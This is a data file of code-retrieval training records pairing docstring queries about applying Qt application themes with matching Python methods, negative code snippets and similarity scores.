get_file_inter_name(self):\n\t\tf = tempfile.NamedTemporaryFile(encoding='utf-8',mode='r',delete=False)\n\t\tf.close()\n\t\treturn f.name", "def get_csv_file_name(output_dir, file_prefix, file_suffix):\n\tcsv_filename = \"\".join([file_prefix, '_', file_suffix, '.csv'])\n\treturn os.path.join(output_dir, csv_filename)", "def get_output_name(input_path):\n file_name, file_ext = os.path.splitext(os.path.basename(input_path))\n return os.path.abspath(\"out\" + os.path.sep + file_name + \"_geo\" + file_ext)", "def name(self):\n #type: ()->Text\n return (\n os.path.splitext(os.path.basename(self.fileName))[0])", "def get_output_file_name(run_parameters, dir_name_key, prefix_string, suffix_string='', type_suffix='tsv'):\n output_file_name = os.path.join(run_parameters[dir_name_key], prefix_string + '_' +\n run_parameters['method'] + '_' + run_parameters[\"correlation_measure\"])\n\n output_file_name = kn.create_timestamped_filename(output_file_name) + '_' + suffix_string + '.' + type_suffix\n return output_file_name", "def _get_temp_file_name():\n tmpfile = tempfile.NamedTemporaryFile(prefix=\"TESS_\")\n h, t = ntpath.split(tmpfile.name)\n return t or ntpath.basename(h)", "def _getfilename(self):\n pass", "def _get_output_filename(dataset_dir):\n return os.path.join(dataset_dir, 'pokemon.tfrecord')", "def GetOutputFilename(fname):\n return os.path.join(outdir, fname)", "def get_name(self):\n return self.file_name", "def _file_name(self, dtype_out_time, extension='nc'):\n out_lbl = utils.io.data_out_label(self.intvl_out, dtype_out_time,\n dtype_vert=self.dtype_out_vert)\n in_lbl = utils.io.data_in_label(self.intvl_in, self.dtype_in_time,\n self.dtype_in_vert)\n ens_lbl = utils.io.ens_label(self.ens_mem)\n yr_lbl = utils.io.yr_label((self.start_date.year, self.end_date.year))\n return '.'.join(\n [self.name, out_lbl, in_lbl, self.model.name,\n self.run.name, ens_lbl, yr_lbl, extension]\n ).replace('..', '.')", "def GetFileName(self) -> \"char const *\":\n return _itkVTKPolyDataReaderPython.itkVTKPolyDataReaderMF2_GetFileName(self)", "def GetFileName(self) -> \"char const *\":\n return _itkVTKPolyDataReaderPython.itkVTKPolyDataReaderMD2_GetFileName(self)" ]
[ "0.74351394", "0.7248863", "0.72257614", "0.7196246", "0.70979714", "0.7075223", "0.7033236", "0.7024702", "0.7010298", "0.698268", "0.6951329", "0.6924173", "0.69214404", "0.691918", "0.6910793", "0.69105744", "0.6872355", "0.6843693", "0.6799241", "0.6777324", "0.67486", "0.67329013", "0.6722986", "0.671325", "0.6695107", "0.6694636", "0.6646135", "0.6603093", "0.65832734", "0.6579765" ]
0.7691399
0
Apply base theme to the application.
def _apply_base_theme(self, app): app.setStyle("Fusion") with open(self._STYLESHEET) as stylesheet: app.setStyleSheet(stylesheet.read())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def apply_theme(self, ax):\n pass", "def apply_style(self, app):\n\n darkPalette = QPalette()\n\n # base\n darkPalette.setColor(QPalette.WindowText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Button, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Light, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Midlight, QColor(90, 90, 90))\n darkPalette.setColor(QPalette.Dark, QColor(35, 35, 35))\n darkPalette.setColor(QPalette.Text, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.BrightText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.ButtonText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Base, QColor(42, 42, 42))\n darkPalette.setColor(QPalette.Window, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Shadow, QColor(20, 20, 20))\n darkPalette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n darkPalette.setColor(QPalette.HighlightedText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Link, QColor(56, 252, 196))\n darkPalette.setColor(QPalette.AlternateBase, QColor(66, 66, 66))\n darkPalette.setColor(QPalette.ToolTipBase, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.ToolTipText, QColor(180, 180, 180))\n\n # disabled\n darkPalette.setColor(\n QPalette.Disabled, QPalette.WindowText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Text, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.ButtonText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Highlight, QColor(80, 80, 80)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.HighlightedText, QColor(127, 127, 127)\n )\n\n app.setPalette(darkPalette)\n self._apply_base_theme(app)\n\n IconSet.current.set_color(QColor(180, 180, 180))", "def apply_style(self, app):\n\n lightPalette = QPalette()\n\n # base\n lightPalette.setColor(QPalette.WindowText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.Button, QColor(240, 240, 240))\n lightPalette.setColor(QPalette.Light, QColor(180, 180, 180))\n lightPalette.setColor(QPalette.Midlight, QColor(200, 200, 200))\n lightPalette.setColor(QPalette.Dark, QColor(225, 225, 225))\n lightPalette.setColor(QPalette.Text, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.BrightText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.ButtonText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.Base, QColor(237, 237, 237))\n lightPalette.setColor(QPalette.Window, QColor(240, 240, 240))\n lightPalette.setColor(QPalette.Shadow, QColor(20, 20, 20))\n lightPalette.setColor(QPalette.Highlight, QColor(76, 163, 224))\n lightPalette.setColor(QPalette.HighlightedText, QColor(0, 0, 0))\n lightPalette.setColor(QPalette.Link, QColor(0, 162, 232))\n lightPalette.setColor(QPalette.AlternateBase, QColor(225, 225, 225))\n lightPalette.setColor(QPalette.ToolTipBase, QColor(240, 240, 240))\n lightPalette.setColor(QPalette.ToolTipText, QColor(0, 0, 0))\n\n # disabled\n lightPalette.setColor(\n QPalette.Disabled, QPalette.WindowText, QColor(115, 115, 115)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.Text, QColor(115, 115, 115)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.ButtonText, QColor(115, 115, 115)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.Highlight, QColor(190, 190, 190)\n )\n lightPalette.setColor(\n QPalette.Disabled, QPalette.HighlightedText, QColor(115, 115, 115)\n )\n\n app.setPalette(lightPalette)\n\n self._apply_base_theme(app)\n IconSet.current.set_color(QColor(0, 0, 0))", "def change_theme(self):\n # get the QApplication instance, or crash if not set\n app = QtWidgets.QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def change_theme(self):\n # get the QApplication instance, or crash if not set\n app = QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def dark_theme(self):\n if self.actionDark_Theme.isChecked():\n QApplication.setStyle(QStyleFactory.create(\"Fusion\"))\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(53, 53, 53))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(15, 15, 15))\n palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53, 53, 53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Highlight, QColor(0, 24, 193).lighter())\n palette.setColor(QPalette.HighlightedText, Qt.black)\n palette.setColor(QPalette.Disabled, QPalette.Text, Qt.darkGray)\n palette.setColor(\n QPalette.Disabled, QPalette.ButtonText, Qt.darkGray)\n app.setPalette(palette)\n return\n\n app.setPalette(self.defaultPalette)", "def setup_theme(app):\r\n theme = app.config['THEME']\r\n app.template_folder = os.path.join('themes', theme, 'templates')\r\n app.static_folder = os.path.join('themes', theme, 'static')", "def new_theme(ctx, **defaults):\n from .quickstart import theme_quickstart\n\n project = ctx.get_project(silent=True)\n theme_quickstart(defaults, project=project)", "def theme(self, theme):\n\n self._theme = theme", "def refresh(self):\n self._themes = {}\n for theme in starchain(ldr(self.app) for ldr in self.loaders):\n if self.valid_app_id(theme.application):\n self.themes[theme.identifier] = theme\n self.register_theme_assets()", "def setup_theme(self):\r\n template_conf = self._config.template\r\n if isinstance(template_conf, str):\r\n # Either a local path or the name of built-in themes\r\n if os.path.exists(template_conf):\r\n template_conf = {\r\n 'name': os.path.split(template_conf)[-1],\r\n 'type': 'local',\r\n 'path': template_conf\r\n }\r\n elif template_conf in ['Kepler', 'Galileo']:\r\n template_conf = {\r\n 'name': template_conf,\r\n 'type': 'git',\r\n 'url': 'https://github.com/AlanDecode/Maverick-Theme-{}.git'.format(\r\n template_conf),\r\n 'branch': 'latest'\r\n }\r\n else:\r\n raise TemplateError('Can not found local theme {}'.format(\r\n self._config.template))\r\n\r\n # If its remote theme, clone it to disk first\r\n if template_conf['type'] == 'git':\r\n template_path = unify_joinpath(self._config._template_dir,\r\n template_conf['name'])\r\n if not os.path.exists(template_path):\r\n self.clone_remote_theme(self._config._template_dir, template_conf)\r\n template_conf['type'] = 'local'\r\n template_conf['path'] = template_path\r\n\r\n sys.path.insert(0, os.path.split(template_conf['path'])[0])\r\n\r\n # handle deps for theme\r\n template_dep_file = unify_joinpath(template_conf['path'],\r\n 'requirements.txt')\r\n if os.path.exists(template_dep_file) and os.path.isfile(template_dep_file):\r\n try:\r\n run('pip install -r %s' % template_dep_file, '.')\r\n except Exception:\r\n raise TemplateError('Can not install dependencies for theme.')\r\n\r\n from importlib import import_module\r\n self._template = import_module(template_conf['name'])", "def updateTheme(self):\n self.myUpdate(stateDict=None)", "def theme_template_base(context):\n template_path = os.path.join(settings.THEME_NAME, 'theme.html')\n return {'THEME_TEMPLATE': template_path}", "def setWidget(self, widget: QtWidgets.QWidget):\n super().setWidget(widget)\n if globalstuff.theme == 'dark':\n w = self.widget()\n w.setPalette(globalstuff.textpal)\n if hasattr(w, 'TreeWidget'):\n w.TreeWidget.setStyleSheet(globalstuff.treeqss)", "def setup_theme():\n os.system('sudo apt install arc-theme')\n\n output = \"{padding}{mark} Installing theme...\"\n print(output.format(padding=LEFT_PADDING, mark=BALLOT_MARK))", "def enable_theme():\r\n # Workaround for setting THEME_NAME to an empty\r\n # string which is the default due to this ansible\r\n # bug: https://github.com/ansible/ansible/issues/4812\r\n if settings.THEME_NAME == \"\":\r\n settings.THEME_NAME = None\r\n return\r\n\r\n assert settings.FEATURES['USE_CUSTOM_THEME']\r\n settings.FAVICON_PATH = 'themes/{name}/images/favicon.ico'.format(\r\n name=settings.THEME_NAME\r\n )\r\n\r\n # Calculate the location of the theme's files\r\n theme_root = settings.ENV_ROOT / \"themes\" / settings.THEME_NAME\r\n\r\n # Include the theme's templates in the template search paths\r\n settings.TEMPLATE_DIRS.insert(0, theme_root / 'templates')\r\n edxmako.paths.add_lookup('main', theme_root / 'templates', prepend=True)\r\n\r\n # Namespace the theme's static files to 'themes/<theme_name>' to\r\n # avoid collisions with default edX static files\r\n settings.STATICFILES_DIRS.append(\r\n (u'themes/{}'.format(settings.THEME_NAME), theme_root / 'static')\r\n )", "def applyStyle(self, target=QtGui.QApplication):\n target.setPalette(self.palette)", "def appstyle(whom, stylename = 'Plastique',stylecolor = 'Default'):\r\n\r\n## for iz in QtGui.QStyleFactory.keys():\r\n## print iz\r\n\r\n QtGui.QApplication.setStyle(QtGui.QStyleFactory.create(stylename))\r\n QtGui.QApplication.setPalette(QtGui.QApplication.style().standardPalette())\r\n applycolors(whom,stylecolor)", "def light_mode(grid: bool = False) -> sns.set_theme:\n if grid:\n return sns.set_theme(style=\"whitegrid\")\n sns.set_theme(style=\"white\")", "def main(themes):\n # Get toggled mode based on current system mode.\n toggled_mode = get_toggled_mode(get_current_mode())\n print('\\nSetting themes...')\n\n for theme in themes:\n # Set toggled mode.\n theme.mode = toggled_mode\n theme.toggle_callback(theme)\n if IS_WINDOWS:\n print(f'Setting system theme to: {toggled_mode.name}')\n toggle_mode(toggled_mode)\n print()", "def my_theme() -> Dict[str, Any]:\n return {\n \"config\": {\n \"view\": {\"height\": 400, \"width\": 600},\n \"legend\": {\"titleFontSize\": 20, \"labelFontSize\": 16},\n \"axis\": {\"grid\": False, \"labelFontSize\": 16, \"titleFontSize\": 20},\n \"header\": {\"titleFontSize\": 22, \"labelFontSize\": 18},\n \"background\": \"white\",\n }\n }", "def generateScheme(self, apply=True):\n BASE_COLOR = self.baseColor\n HIGHLIGHT_COLOR = self.highlightColor\n BRIGHTNESS_SPREAD = self.spread\n \n if self.__lightness(BASE_COLOR) > 0.5:\n SPREAD = 100/BRIGHTNESS_SPREAD\n else:\n SPREAD = 100*BRIGHTNESS_SPREAD\n \n if self.__lightness(HIGHLIGHT_COLOR)>0.6:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.darker(SPREAD*2)\n else:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.lighter(SPREAD*2)\n \n self.palette.setBrush(QtGui.QPalette.Window, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.WindowText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Foreground, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Base, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.AlternateBase, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.ToolTipBase, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.ToolTipText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Text, QtGui.QBrush(BASE_COLOR.lighter(SPREAD*1.2)))\n self.palette.setBrush(QtGui.QPalette.Button, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/3)))\n self.palette.setBrush(QtGui.QPalette.ButtonText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.BrightText, QtGui.QBrush(QtGui.QColor(240, 240, 240)))\n \n self.palette.setBrush(QtGui.QPalette.Light, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Midlight, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/2)))\n self.palette.setBrush(QtGui.QPalette.Dark, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Mid, QtGui.QBrush(BASE_COLOR)) \n self.palette.setBrush(QtGui.QPalette.Shadow, QtGui.QBrush(BASE_COLOR.darker(SPREAD))) \n \n self.palette.setBrush(QtGui.QPalette.Highlight, QtGui.QBrush(HIGHLIGHT_COLOR))\n self.palette.setBrush(QtGui.QPalette.HighlightedText, QtGui.QBrush(HIGHLIGHTEDTEXT_COLOR))\n if apply:\n QtGui.QApplication.setPalette(self.palette)", "def init_ui(self):\n self.parent.title(\"Roku Player Controller\")\n self.style.theme_use(\"default\")", "def themes(self, themes):\n\n self._themes = themes", "def on_load_theme (self):\n\n\t\tif self.has_started:\n\t\t\tself.init_buffers()\n\t\t\tself.redraw_background()\n\t\t\tself.redraw_foreground()", "def my_theme() -> Dict[str, Any]:\n font = \"Roboto\"\n return {\n \"config\": {\n \"view\": {\"height\": 400, \"width\": 600},\n \"legend\": {\n \"titleFontSize\": 20,\n \"labelFontSize\": 16,\n \"labelFont\": font,\n \"titleFont\": font,\n },\n \"axis\": {\n \"grid\": False,\n \"labelFontSize\": 16,\n \"titleFontSize\": 20,\n \"labelFont\": font,\n \"titleFont\": font,\n },\n \"header\": {\n \"titleFontSize\": 22,\n \"labelFontSize\": 18,\n \"titleFont\": font,\n \"labelFont\": font,\n },\n \"background\": \"white\",\n }\n }", "def makeThemeDrawer(self,node):\n themeDrawer = self.makeDrawer(node)\n themeDrawer.getRoot().setTexture(self.image)\n return themeDrawer", "def get_theme(self) -> str:\n return self.theme or self.account.theme" ]
[ "0.71454114", "0.7026285", "0.7016173", "0.6658857", "0.66372305", "0.6465947", "0.6465947", "0.6419377", "0.63436294", "0.6121915", "0.60901904", "0.607666", "0.6037439", "0.5978628", "0.5909347", "0.5894715", "0.5894359", "0.5853654", "0.5733367", "0.5661598", "0.56274146", "0.56220305", "0.549437", "0.54818314", "0.547481", "0.5384724", "0.5383973", "0.53242594", "0.52696514", "0.52685803" ]
0.83967525
0
Apply Light Theme to the Qt application instance.
def apply_style(self, app): lightPalette = QPalette() # base lightPalette.setColor(QPalette.WindowText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.Button, QColor(240, 240, 240)) lightPalette.setColor(QPalette.Light, QColor(180, 180, 180)) lightPalette.setColor(QPalette.Midlight, QColor(200, 200, 200)) lightPalette.setColor(QPalette.Dark, QColor(225, 225, 225)) lightPalette.setColor(QPalette.Text, QColor(0, 0, 0)) lightPalette.setColor(QPalette.BrightText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.ButtonText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.Base, QColor(237, 237, 237)) lightPalette.setColor(QPalette.Window, QColor(240, 240, 240)) lightPalette.setColor(QPalette.Shadow, QColor(20, 20, 20)) lightPalette.setColor(QPalette.Highlight, QColor(76, 163, 224)) lightPalette.setColor(QPalette.HighlightedText, QColor(0, 0, 0)) lightPalette.setColor(QPalette.Link, QColor(0, 162, 232)) lightPalette.setColor(QPalette.AlternateBase, QColor(225, 225, 225)) lightPalette.setColor(QPalette.ToolTipBase, QColor(240, 240, 240)) lightPalette.setColor(QPalette.ToolTipText, QColor(0, 0, 0)) # disabled lightPalette.setColor( QPalette.Disabled, QPalette.WindowText, QColor(115, 115, 115) ) lightPalette.setColor( QPalette.Disabled, QPalette.Text, QColor(115, 115, 115) ) lightPalette.setColor( QPalette.Disabled, QPalette.ButtonText, QColor(115, 115, 115) ) lightPalette.setColor( QPalette.Disabled, QPalette.Highlight, QColor(190, 190, 190) ) lightPalette.setColor( QPalette.Disabled, QPalette.HighlightedText, QColor(115, 115, 115) ) app.setPalette(lightPalette) self._apply_base_theme(app) IconSet.current.set_color(QColor(0, 0, 0))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def change_theme(self):\n # get the QApplication instance, or crash if not set\n app = QtWidgets.QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def change_theme(self):\n # get the QApplication instance, or crash if not set\n app = QApplication.instance()\n if app is None:\n raise RuntimeError(\"No Qt Application found.\")\n\n if self.darkCheckBox.isChecked():\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n else:\n app.setStyleSheet(\"\")", "def apply_style(self, app):\n\n darkPalette = QPalette()\n\n # base\n darkPalette.setColor(QPalette.WindowText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Button, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Light, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Midlight, QColor(90, 90, 90))\n darkPalette.setColor(QPalette.Dark, QColor(35, 35, 35))\n darkPalette.setColor(QPalette.Text, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.BrightText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.ButtonText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Base, QColor(42, 42, 42))\n darkPalette.setColor(QPalette.Window, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.Shadow, QColor(20, 20, 20))\n darkPalette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n darkPalette.setColor(QPalette.HighlightedText, QColor(180, 180, 180))\n darkPalette.setColor(QPalette.Link, QColor(56, 252, 196))\n darkPalette.setColor(QPalette.AlternateBase, QColor(66, 66, 66))\n darkPalette.setColor(QPalette.ToolTipBase, QColor(53, 53, 53))\n darkPalette.setColor(QPalette.ToolTipText, QColor(180, 180, 180))\n\n # disabled\n darkPalette.setColor(\n QPalette.Disabled, QPalette.WindowText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Text, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.ButtonText, QColor(127, 127, 127)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.Highlight, QColor(80, 80, 80)\n )\n darkPalette.setColor(\n QPalette.Disabled, QPalette.HighlightedText, QColor(127, 127, 127)\n )\n\n app.setPalette(darkPalette)\n self._apply_base_theme(app)\n\n IconSet.current.set_color(QColor(180, 180, 180))", "def dark_theme(self):\n if self.actionDark_Theme.isChecked():\n QApplication.setStyle(QStyleFactory.create(\"Fusion\"))\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(53, 53, 53))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(15, 15, 15))\n palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53, 53, 53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Highlight, QColor(0, 24, 193).lighter())\n palette.setColor(QPalette.HighlightedText, Qt.black)\n palette.setColor(QPalette.Disabled, QPalette.Text, Qt.darkGray)\n palette.setColor(\n QPalette.Disabled, QPalette.ButtonText, Qt.darkGray)\n app.setPalette(palette)\n return\n\n app.setPalette(self.defaultPalette)", "def _apply_base_theme(self, app):\n\n app.setStyle(\"Fusion\")\n\n with open(self._STYLESHEET) as stylesheet:\n app.setStyleSheet(stylesheet.read())", "def apply_theme(self, ax):\n pass", "def setWidget(self, widget: QtWidgets.QWidget):\n super().setWidget(widget)\n if globalstuff.theme == 'dark':\n w = self.widget()\n w.setPalette(globalstuff.textpal)\n if hasattr(w, 'TreeWidget'):\n w.TreeWidget.setStyleSheet(globalstuff.treeqss)", "def updateTheme(self):\n self.myUpdate(stateDict=None)", "def appstyle(whom, stylename = 'Plastique',stylecolor = 'Default'):\r\n\r\n## for iz in QtGui.QStyleFactory.keys():\r\n## print iz\r\n\r\n QtGui.QApplication.setStyle(QtGui.QStyleFactory.create(stylename))\r\n QtGui.QApplication.setPalette(QtGui.QApplication.style().standardPalette())\r\n applycolors(whom,stylecolor)", "def applyStyle(self, target=QtGui.QApplication):\n target.setPalette(self.palette)", "def dark_mode(app):\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(30, 30, 30))\n palette.setColor(QPalette.WindowText, QColor(225, 225, 225))\n palette.setColor(QPalette.Light, Qt.white)\n palette.setColor(QPalette.Midlight, QColor(225, 225, 225))\n palette.setColor(QPalette.Dark, QColor(65, 65, 65))\n palette.setColor(QPalette.Mid, QColor(160, 160, 160))\n palette.setColor(QPalette.BrightText, QColor(255, 51, 51))\n palette.setColor(QPalette.Button, QColor(40, 40, 40))\n palette.setColor(QPalette.Base, QColor(65, 65, 65))\n palette.setColor(QPalette.AlternateBase, QColor(50, 50, 50))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, QColor(225, 225, 225))\n palette.setColor(QPalette.ButtonText, QColor(225, 225, 225))\n palette.setColor(QPalette.Link, QColor(42, 130, 218))\n palette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n palette.setColor(QPalette.HighlightedText, Qt.black)\n app.setPalette(palette)\n return app", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def light_mode(grid: bool = False) -> sns.set_theme:\n if grid:\n return sns.set_theme(style=\"whitegrid\")\n sns.set_theme(style=\"white\")", "def theme(self, theme):\n\n self._theme = theme", "def generateScheme(self, apply=True):\n BASE_COLOR = self.baseColor\n HIGHLIGHT_COLOR = self.highlightColor\n BRIGHTNESS_SPREAD = self.spread\n \n if self.__lightness(BASE_COLOR) > 0.5:\n SPREAD = 100/BRIGHTNESS_SPREAD\n else:\n SPREAD = 100*BRIGHTNESS_SPREAD\n \n if self.__lightness(HIGHLIGHT_COLOR)>0.6:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.darker(SPREAD*2)\n else:\n HIGHLIGHTEDTEXT_COLOR= BASE_COLOR.lighter(SPREAD*2)\n \n self.palette.setBrush(QtGui.QPalette.Window, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.WindowText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Foreground, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Base, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.AlternateBase, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.ToolTipBase, QtGui.QBrush(BASE_COLOR))\n self.palette.setBrush(QtGui.QPalette.ToolTipText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Text, QtGui.QBrush(BASE_COLOR.lighter(SPREAD*1.2)))\n self.palette.setBrush(QtGui.QPalette.Button, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/3)))\n self.palette.setBrush(QtGui.QPalette.ButtonText, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.BrightText, QtGui.QBrush(QtGui.QColor(240, 240, 240)))\n \n self.palette.setBrush(QtGui.QPalette.Light, QtGui.QBrush(BASE_COLOR.lighter(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Midlight, QtGui.QBrush(BASE_COLOR.lighter(SPREAD/2)))\n self.palette.setBrush(QtGui.QPalette.Dark, QtGui.QBrush(BASE_COLOR.darker(SPREAD)))\n self.palette.setBrush(QtGui.QPalette.Mid, QtGui.QBrush(BASE_COLOR)) \n self.palette.setBrush(QtGui.QPalette.Shadow, QtGui.QBrush(BASE_COLOR.darker(SPREAD))) \n \n self.palette.setBrush(QtGui.QPalette.Highlight, QtGui.QBrush(HIGHLIGHT_COLOR))\n self.palette.setBrush(QtGui.QPalette.HighlightedText, QtGui.QBrush(HIGHLIGHTEDTEXT_COLOR))\n if apply:\n QtGui.QApplication.setPalette(self.palette)", "def new_with_dark_light(dark_theme, light_theme):\n theme = {\n \"dark\": Theme(dark_theme),\n \"light\": Theme(light_theme)\n }\n return theme", "def refresh(self):\n self._themes = {}\n for theme in starchain(ldr(self.app) for ldr in self.loaders):\n if self.valid_app_id(theme.application):\n self.themes[theme.identifier] = theme\n self.register_theme_assets()", "def setUIBrightness(self, value):\n\n\t\t# print(value)\n\t\tself.col['window'] = QtGui.QColor(value, value, value)\n\t\tself.computeUIPalette()\n\t\tself.loadStyleSheet()", "def on_load_theme (self):\n\n\t\tif self.has_started:\n\t\t\tself.init_buffers()\n\t\t\tself.redraw_background()\n\t\t\tself.redraw_foreground()", "def changeStyle(self, event=None):\n content = self.combo.get()\n try:\n self.style.theme_use(content)\n except tk.TclError as err:\n tk.messagebox.showerror('Error', err)\n else:\n self.theme.set(content)", "def update_background(self):\n color = QColorDialog().getColor()\n self.model.set('Look', 'background', str(color.name(QColor.HexRgb)))\n self.model.announce_update()", "def main(themes):\n # Get toggled mode based on current system mode.\n toggled_mode = get_toggled_mode(get_current_mode())\n print('\\nSetting themes...')\n\n for theme in themes:\n # Set toggled mode.\n theme.mode = toggled_mode\n theme.toggle_callback(theme)\n if IS_WINDOWS:\n print(f'Setting system theme to: {toggled_mode.name}')\n toggle_mode(toggled_mode)\n print()", "def __init__(self,baseColor=QtGui.QColor(50,50,50), highlightColor=QtGui.QColor(\"yellow\"), spread=2.5):\n self.palette = QtGui.QPalette()\n self.baseColor = baseColor\n self.highlightColor = highlightColor\n self.spread = spread\n self.generateScheme()\n QtGui.QApplication.setStyle(\"Plastique\")", "def theme_picker_open(self):\r\n if not self.md_theme_picker:\r\n self.md_theme_picker = MDThemePicker()\r\n self.md_theme_picker.open()", "def new_theme(ctx, **defaults):\n from .quickstart import theme_quickstart\n\n project = ctx.get_project(silent=True)\n theme_quickstart(defaults, project=project)", "def set_light_color(self, light_color):\n\n self.light_color = light_color", "def set_device_theme(dname, theme_type, number=0):\n\n # log in theme app like i theme\n activity_name = theme_config.getValue(dname,'set_theme_pkg')\n #DEVICE = device.Device(dname)\n #DEVICE.app_operation(action='LAUNCH', pkg=activity_name)\n DEVICE = adbtools.AdbTools(dname)\n #DEVICE.start_application(activity_name)\n find_text = [u'忽略本次']\n try:\n threads = []\n install_app = threading.Thread(target=DEVICE.start_application(), args=(activity_name,))\n proc_process = 